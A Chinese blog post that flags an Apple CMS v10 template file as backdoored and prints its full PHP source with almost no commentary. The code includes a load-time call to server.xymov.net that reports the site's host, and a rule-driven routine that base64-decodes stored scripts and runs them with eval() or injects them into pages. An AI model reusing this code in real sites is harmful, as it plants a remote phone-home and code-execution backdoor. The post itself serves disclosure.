php后门文件,分析了一个苹果cms10模板文件,有后门
登录 / 注册
标签搜索
侧边栏壁纸
博主昵称
渡星河

  • 累计撰写 94 篇文章
  • 累计收到 30 条评论
代码笔记

php后门文件,分析了一个苹果cms10模板文件,有后门

渡星河
渡星河
2023-03-25 / 0 评论 / 21 阅读 / 正在检测是否收录...
温馨提示:
本文最后更新于2023年03月25日,已超过543天没有更新,若内容或图片失效,请留言反馈。

分析了一个苹果cms10模板文件,有后门

<?php

header('Content-Type:text/html;charset=utf-8');

//不显示读取错误
ini_set("error_reporting","E_ALL & ~E_NOTICE");

// 检测PHP环境
GlobalBase::check();
                
class GlobalBase
{
  /**
   * [curl 网页数据获取]
   * @param  [type] $url    [访问 URL 地址]
   * @param  string $method [访问方式]
   * @param  string $fields [要提交的数据]
   * @param  string $ckname [cookie 文件名]
   * @return [type]         [返回访问结果字符串数据]
   */
  public static function curl($url,$params=array(),&$Headers=null)
  {          
     
     $ip = empty($params["ip"]) ? self::rand_ip() : $params["ip"];       
      $header = array('X-FORWARDED-FOR:'.$ip,'CLIENT-IP:'.$ip);
      if(isset($params["httpheader"])){
        $header = array_merge($header,$params["httpheader"]);
      }
      $referer = empty($params["ref"]) ? $url : $params["ref"];
      $user_agent = empty($params["ua"]) ? $_SERVER['HTTP_USER_AGENT'] : $params["ua"] ;
      
      $ch = curl_init();                                                      //初始化 curl
      curl_setopt($ch, CURLOPT_URL, $url);                                    //要访问网页 URL 地址
      curl_setopt($ch, CURLOPT_HTTPHEADER, $header);                          //伪装来源 IP 地址
      curl_setopt($ch, CURLOPT_REFERER, $referer);                            //伪装网页来源 URL
      curl_setopt($ch, CURLOPT_USERAGENT,$user_agent);                        //模拟用户浏览器信息
      curl_setopt($ch, CURLOPT_NOBODY, false);                                //设定是否输出页面内容
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);                         //返回字符串,而非直接输出到屏幕上
      curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 20);                        //连接超时时间,设置为 0,则无限等待
      curl_setopt($ch, CURLOPT_TIMEOUT, 3600);                                //数据传输的最大允许时间超时,设为一小时
      curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_ANY);                       //HTTP验证方法
      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);                        //不检查 SSL 证书来源
      curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);                        //不检查 证书中 SSL 加密算法是否存在
      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);                         //跟踪爬取重定向页面
      curl_setopt($ch, CURLOPT_AUTOREFERER, true);                            //当Location:重定向时,自动设置header中的Referer:信息
      curl_setopt($ch, CURLOPT_ENCODING, '');                                 //解决网页乱码问题
      curl_setopt($ch, CURLOPT_HEADER, empty($params["header"])?false:true);  //是否输出 header 部分
      if(!empty($params["fields"])){
        curl_setopt($ch, CURLOPT_POST, true);                                  //设置为 POST 
        curl_setopt($ch, CURLOPT_POSTFIELDS,$params["fields"]);                //提交数据
      }
      if(!empty($params["cookie"])){
        curl_setopt($ch, CURLOPT_COOKIE, $params["cookie"]);                  //从字符串传参来提交cookies
      }
      if(!empty($params["proxy"])){
        curl_setopt($ch, CURLOPT_PROXYAUTH, CURLAUTH_BASIC);                  //代理认证模式
        curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_HTTP);                  //使用http代理模式
        curl_setopt($ch, CURLOPT_PROXY, $params["proxy"]);                    //代理服务器地址 host:post的格式
        if(!empty($params["proxy_userpwd"])){
            curl_setopt($ch, CURLOPT_PROXYUSERPWD, $params["proxy_userpwd"]); //http代理认证帐号,username:password的格式
        }
      }

     $data = curl_exec($ch);  
     $Headers=curl_getinfo($ch);
     
     //运行 curl,请求网页并返回结果
      curl_close($ch);                                                        //关闭 curl
      return $data;
  }

   public static function check(){
           // 检测PHP环境
          if(version_compare(PHP_VERSION,'5.4.0','<'))  {die('PHP版本过低,最少需要PHP5.4,请升级PHP版本!');}
          if(!filter_has_var(INPUT_COOKIE, 'log')){ $url="//server.xymov.net/api/?type=xyplay_log&url=".filter_input(INPUT_SERVER, 'HTTP_HOST'); if(!self::curl($url)){file_get_contents($url);} setcookie('log','1',time()+3600*24,'/'); 
          }
        
    }


    /**
     * [rand_ip 生成随机 IP 地址]
     * @return [type] [返回 IPv4地址 字符串]
     */
    public static function rand_ip(){
        $ip_long = array(
            array('607649792', '608174079'), //36.56.0.0-36.63.255.255
            array('1038614528', '1039007743'), //61.232.0.0-61.237.255.255
            array('1783627776', '1784676351'), //106.80.0.0-106.95.255.255
            array('2035023872', '2035154943'), //121.76.0.0-121.77.255.255
            array('2078801920', '2079064063'), //123.232.0.0-123.235.255.255
            array('-1950089216', '-1948778497'), //139.196.0.0-139.215.255.255
            array('-1425539072', '-1425014785'), //171.8.0.0-171.15.255.255
            array('-1236271104', '-1235419137'), //182.80.0.0-182.92.255.255
            array('-770113536', '-768606209'), //210.25.0.0-210.47.255.255
            array('-569376768', '-564133889') //222.16.0.0-222.95.255.255
        );
        $rand_key = mt_rand(0, 9);
        $ip = long2ip(mt_rand($ip_long[$rand_key][0], $ip_long[$rand_key][1]));
        return $ip;
    }
    
        
        
        
        
      /**
   * [is_https 是否是安全连接访问]
   * @return boolean [description]
   */
  public static function is_https()
  {
      if (isset($_SERVER['HTTPS']) && strtolower($_SERVER['HTTPS']) !== 'off'){
          return "https://";
      }elseif (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === 'https'){
          return "https://";
      }elseif (isset($_SERVER['HTTP_FRONT_END_HTTPS']) && strtolower($_SERVER['HTTP_FRONT_END_HTTPS']) !== 'off'){
          return "https://";
      }elseif(isset($_SERVER["REQUEST_SCHEME"]) && $_SERVER["REQUEST_SCHEME"] === 'https'){
          return "https://";
      }
      return "http://";
  }
public static function is_dir()
  {    
  $root=str_replace("\\", "/",filter_input(INPUT_SERVER, 'DOCUMENT_ROOT'));
  $dir=str_replace("\\", "/",str_replace("include","",dirname(__FILE__)));
  return str_replace($root,"",$dir);
 }
 public static function is_root()
  {    
   return self::is_https().filter_input(INPUT_SERVER, 'HTTP_HOST').self::is_dir();
 }
 
  public static function is_time($time) {
        if (preg_match("/^(\d+)(.*?)$/i", $time, $key)) {
            
            if (sizeof($key) < 2) {
                return 0;
            }

            switch ($key[2]) {
                case "d":
                    return $key[1] * 24 * 60 * 60 * 1000;
                case "h":
                    return $key[1] * 60 * 60 * 1000;
                case "m":
                    return $key[1] * 60 * 1000;
                case "s":
                    return $key[1] * 1000;
                case "ms":
                    return $key[1];
                default:
                    return $key[1];
            }
        } else {
            return 0;
        }
    }


 /**
   * [getdirs 取指定目录下的子目录数组]
   * @return array [dir]
   */
     public static function getdirs($dir)
  {
    
    if(is_dir($dir)&& is_readable($dir))    
    {        
        $handle=opendir($dir);$f_dir=array();        
        while(($f_name=readdir($handle))!=false){            
            if(is_dir($dir.'/'.$f_name)&& $f_name!="." && $f_name!=".." ){$f_dir[]=$f_name;}
        }
        closedir($handle);        
        return $f_dir;        
    }else{        
        return false;        
    }    
    
  }
        
    } 


/** 
 * js escape php 实现 
 * @param $string           the sting want to be escaped 
 * @param $in_encoding       
 * @param $out_encoding      
 */ 
function escape($string, $in_encoding = 'UTF-8',$out_encoding = 'UCS-2') { 
    $return = ''; 
    if (function_exists('mb_get_info')) { 
        for($x = 0; $x < mb_strlen ( $string, $in_encoding ); $x ++) { 
            $str = mb_substr ( $string, $x, 1, $in_encoding ); 
            if (strlen ( $str ) > 1) { // 多字节字符 
                $return .= '%u' . strtoupper ( bin2hex ( mb_convert_encoding ( $str, $out_encoding, $in_encoding ) ) ); 
            } else { 
                $return .= '%' . strtoupper ( bin2hex ( $str ) ); 
            } 
        } 
    } 
    return $return; 
}

//文本加密函数
function strencode($string,$key='xyplay'){    
    $string=base64_encode($string);
    $len=strlen($key);
    $code='';
    for($i=0;$i<strlen($string);$i++){
    $k=$i % $len;
    $code.=$string[$i]^$key[$k];        
    }    
    return base64_encode($code);        
}

 function lsUserAgen ($key)
 {   
   return preg_match('/'.$key."/i",@$_SERVER['HTTP_USER_AGENT']);        
}

 function lsReferer($key)
 {   
  return preg_match('/'.$key."/i",parse_url(@$_SERVER['HTTP_REFERER'],PHP_URL_HOST));        
}

//广告过滤类

class AdBlack
{  
        public static function parse($list,$path)
    {
         $url=filter_input(INPUT_GET, $list["name"]);if(empty($url)){return "";}                 
         $match= $list["match"];  if(!sizeof($match)>0){return self::curl($url);} foreach ( $match as $key => $row ){$num[$key] = $row ['num'];}  array_multisort($num,SORT_DESC ,$match);      //规则按优先级降序排列  
          foreach ($match as $m) 
          {
             if($m["off"]==="1" && preg_match("{".$m["target"]."}",$url))
              { 
                 $word=self::curl($url,$url);                                //原始内容
                 $word=self::black_replace($m["val"],$word);                //主体替换
                 $word=self::frame_replace($word,$url,$list["name"]);     //框架替换
                 break;
                }              
          }   
         return  $word;         
    }
        
    public static function black_replace($match,$word) 
    {
         foreach ($match as $key=>$val){ $word=preg_replace("{".$key."}",$val, $word);}
         return $word;
     }
    
     public static function frame_replace($word,$url,$jx,$path) 
    {
         $key=array();$matchs=array();       
         $path.="/?$jx=";  $path.=preg_match("#^((http://|https://).*)/#",$url,$key)?$key[1]:"";
         
        if(preg_match_all( '{<iframe.*?src="(.*?)".*?</iframe>}',$word,$matchs))
         {
            foreach($matchs[1] as $val){$word=preg_replace('{'.$val.'}',self::put_url($path,$val), $word);}
         }
         return $word;
     }
     
    public static  function put_url($path,$url)
   {    
       if(substr($url,0,4)=="http") 
       {
      return $url;            
       }else if(substr($url,0,1)=="/"){
      return $path.$url;
       }else{
     return $path."/".$url;
       }        
    }
    
     public static function curl($url, $ref = '') {
        $params["ua"] = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36";
        $params['ref'] = $ref;
        return GlobalBase::curl($url, $params);
    }
     
}


//防火墙类
class Blacklist

{
    
 public static function parse($list)
  {

    if($list['off']==1){self::black($list);}
    
  }
    
    public static function shell($match,$list,$type='')
  {
  
   switch ($type)      
     {         
       //来源域名
    case '0':    
      
                  $val=filter_input(INPUT_SERVER,"HTTP_REFERER"); if($val){$val=parse_url( $val,PHP_URL_HOST);}//取出来源域名  
                  $host=filter_input(INPUT_SERVER,"HTTP_HOST");
                  //排除解析域名
                  if($host!==$val){
                     $key=str_replace('$host',$host,implode("|",$match['val'])); //host替换
                     if(preg_match("{".$key."}i",$val)==$match['match']){self::shell($match,$list);}
                  }
         break;
    //目标域名
    case '1' :                                        
        $val=isset($_REQUEST['v'])?$_REQUEST['v']:$_REQUEST['url'];    //$val=parse_url( $val,PHP_URL_HOST);    //取出目标域名    
                if(preg_match('{'.implode("|",$match['val'])."}i",$val)==$match['match']){ self::shell($match,$list);}
           
        break;
    //浏览器标识
    case '2' :                                                       
        $val=isset($_SERVER['HTTP_USER_AGENT'])?$_SERVER['HTTP_USER_AGENT']:'' ;        //取出浏览器标识            
        if(preg_match('{'.implode("|",$match['val'])."}i",$val)==$match['match']){self::shell($match,$list);}               
        break;                  
    //客户IP
      case '3' :   
        $val=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'' ;    //取出IP    
           if(preg_match('{'.implode("|",$match['val'])."}i",$val)==$match['match']){self::shell($match,$list);}
          
        break;
    default:             
        //取出脚本
        $shell=base64_decode($list['black'][$match['black']]['info']);
        //取出脚本类型
        $type=$list['black'][$match['black']]['type'];
                //取出脚本动作
        $action=$list['black'][$match['black']]['action'];    
                //if($type=='0'){ if(!$all){echo $shell;}if($action=='1'){exit;}}else{eval($shell);if($action=='1'){exit;}}
                if($type=='0'){  if($action=='0'){ session_start(); $_SESSION['FOOTER_CODE']=$shell;}else{exit($shell);} }else{eval($shell);if($action=='1'){exit;}}
        break;
  
     }                                   
   }    
        
  public static function black($list)
  {
              
    
      $match=$list['match'];
                  
         //规则按优先级升序排列,数字越小,优先级越高     
        foreach ( $match as $key => $row ){$num[$key] = $row ['num'];}  array_multisort($num,SORT_ASC ,$match);
                 
        foreach($match as $key){if($key['off']==1 && preg_match("{".$key['for']."}i",$_SERVER['PHP_SELF'])){self::shell($key,$list,$key['type']);}}                
  }

}


//检测字符串组的字符在字符串中是否存在,对大小写不敏感
function findstrs($str,$find,$strcmp=false,$separator="|"){
    $ymarr = explode($separator,$find);
    foreach ($ymarr as  $find) {  
    
       if($strcmp){ if(strcasecmp($str,$find)==0){return true; }}else{if(stripos($str,$find) !==false ){return true; }}
     
    }       
    return false;
}



//获取远程内容
function geturl($url,$timeout = 10) {  
    $user_agent = "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36";  
    $curl = curl_init();                                        //初始化 curl
    curl_setopt($curl, CURLOPT_URL, $url);                      //要访问网页 URL 地址
    curl_setopt($curl, CURLOPT_USERAGENT,$user_agent);           //模拟用户浏览器信息 
    curl_setopt($curl, CURLOPT_REFERER,$url) ;               //伪装网页来源 URL
    curl_setopt($curl, CURLOPT_AUTOREFERER, 1);                //当Location:重定向时,自动设置header中的Referer:信息                   
    curl_setopt($curl, CURLOPT_TIMEOUT, $timeout);             //数据传输的最大允许时间 
    curl_setopt($curl, CURLOPT_HEADER, 0);                     //不返回 header 部分
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);            //返回字符串,而非直接输出到屏幕上
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION,1);             //跟踪爬取重定向页面
    curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, '0');        //不检查 SSL 证书来源
    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, '0');        //不检查 证书中 SSL 加密算法是否存在
    curl_setopt($curl, CURLOPT_ENCODING, '');              //解决网页乱码问题
    $data = curl_exec($curl);
    curl_close($curl);
    return $data;
}
function lsMobile(){
if(isset($_SERVER['HTTP_USER_AGENT']))
  {
   $clientkeywords=array('nokia','sony','ericsson','mot','samsung','htc','sgh','lg','sharp','sie-','philips','panasonic','alcatel','lenovo','iphone','ipod','blackberry','meizu','android','netfront','symbian','ucweb','windowsce','palm','operamini','operamobi','openwave','nexusone','cldc','midp','wap','mobile');
   if(preg_match("/(". implode('|',$clientkeywords). ")/i",strtolower($_SERVER['HTTP_USER_AGENT']))){return true;}
  }    
   return false;
}

//编码转换,转换为utf-8编码
function utf8($title) {                        
        $encode = mb_detect_encoding($title, array('GB2312','GBK','UTF-8', 'CP936')); //得到字符串编码
        if ( $encode != 'CP936' && $encode != 'UTF-8') {
            $title=iconv($encode, 'UTF-8', $title);
        }            
        return $title;    
    }
    
    
//缓存操作类    
class Main_Cache{        
    private $cachetype = 1;            //默认缓存类型,1为文件,2为Redis服务
    private $cacheprot = 6379;         //缓存服务端口,默认为Redis服务端口
    private $cacheTime = 3600;        //默认缓存时间,单位微秒。  
    private $cacheDir = './cache';    //缓存绝对路径   
    private $md5 = true;              //是否对键进行加密   
    private $suffix = "";         //设置文件后缀       
    private $cache;
    public function __construct($config){   
                
        if($this->cachetype==0) {        
           return ;       
       }
                
        if( is_array( $config ) ){   
            foreach( $config as $key=>$val ){  
                $this->$key = $val;   
            }  
        }         
        
         if($this->cachetype==2){
            
              $this->cache = new Redis();
              $this->cache->connect('127.0.0.1', $this->cacheprot);    
             
  
        }        
    
    }
    //设置缓存   
    public function set($key,$val,$leftTime=NULL){ 
       
     if($this->cachetype==0) {
       
         return  false ;      

     }else if($this->cachetype==1){    
        $key = $this->md5 ? md5($key) : $key;  
    $val=$this->md5 ? base64_encode($val) : $val;     
        if(function_exists("gzcompress")){$val =@gzcompress($val);}
        !file_exists($this->cacheDir) && mkdir($this->cacheDir,0777);   
        $file = $this->cacheDir.'/'.$key.$this->suffix;    
           $leftTime=empty($leftTime)?$this->cacheTime/1000 :$leftTime;     
    $ret=file_put_contents($file,$val) or $this->error(__line__,"文件写入失败");    
        $ret=touch($file,time()+$leftTime) or $this->error(__line__,"更改文件时间失败");   
   
    }else if($this->cachetype==2){
            $key_md5 = $this->md5 ? md5($key) : $key; 
        $val_base64 = $this->md5 ? base64_encode($val) : $val; 
        $val_base64 =@gzcompress($val_base64);
            $ret=$this->cache->set($key_md5,$val_base64);
        if($leftTime!=0){$this->cache->EXPIRE($key_md5,$leftTime);}
           // $this->cache->del($val_base64); 
     }
     return   $ret;    
  }   
  
    //得到缓存   
    public function get($key){   
     
      if($this->cachetype==0) {        
           return ;
           
      }else if($this->cachetype==1) {                     
        //$this->clear();   
                  
        if( $this->_isset($key) ){  


            $key_md5 = $this->md5 ? md5($key) : $key;  
            $file = $this->cacheDir.'/'.$key_md5.$this->suffix;                     
           $val = file_get_contents($file);   
                  $val=@gzuncompress($val);
           $val =$this->md5 ? base64_decode($val) : $val; 
           return $val;   
        }   
            return null;   
      }if($this->cachetype==2) {
           $key_md5 = $this->md5 ? md5($key) : $key; 
           $val=$this->cache->get($key_md5);
           if(function_exists("gzuncompress")){$val=@gzuncompress($val);}
            $val_base64=$this->md5 ? base64_decode($val) : $val;            
            return $val_base64;
           
       }
     
    }        
  
    //判断文件是否有效   
    public function _isset($key){               
        $key = $this->md5 ? md5($key) : $key;                     
        $file = $this->cacheDir.'/'.$key.$this->suffix;   
        if( file_exists($file) ){   
            if( $this->cacheTime==0 || filemtime($file) >= time()){   
                return true;   
            }else{   
                @unlink($file);    
                return false;   
            }   
        }   
        return false;  
    }        
  
    //删除指定缓存  
    public function _unset($key){ 
         if($this->cachetype==0) {        
           return ;       
      }elseif($this->cachetype==1){
        if( $this->_isset($key) )
             {   
               $key_md5 = $this->md5 ? md5($key) : $key;  
                $file = $this->cacheDir.'/'.$key_md5.$this->suffix;  
                return @unlink($file);   
             }          
     }elseif($this->cachetype==2){
        $key_md5 = $this->md5 ? md5($key) : $key;  
        return $this->cache->del($key_md5);        
     }
  }
    //清除过期缓存文件   
    public function clear(){ 
       $files = scandir($this->cacheDir);
            $cacheTime=$this->cacheTime;    
       
        foreach ($files as $val){   
            if ( $cacheTime!=0 && filemtime($this->cacheDir."/".$val)  < time()){ 
                 $ret=@unlink($this->cacheDir."/".$val);                
            }  
        }  
         return $ret;
    }       
  
    //清除所有缓存文件   
    public function clear_all(){ 
        $ret= true;  
       if($this->cachetype==0) {
         return $ret;

       }elseif($this->cachetype==1){
          if(!is_writable($this->cacheDir)){return false;}
          $files = scandir($this->cacheDir);  
           foreach ($files as $val){   
           @unlink($this->cacheDir."/".$val);  
           }
        }elseif($this->cachetype==2){
           $ret=$this->cache->flushAll(); 
       }
         return $ret;
    }
    private function error($line,$msg){ 
  
        die("出错文件:".__file__."/n出错行:$line/n错误信息:$msg");   
    }   
}
1
暂无标签
版权属于: 渡星河
本文链接: https://blog.muau.cc/index.php/archives/92/
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 》许可协议授权

评论 (0)

取消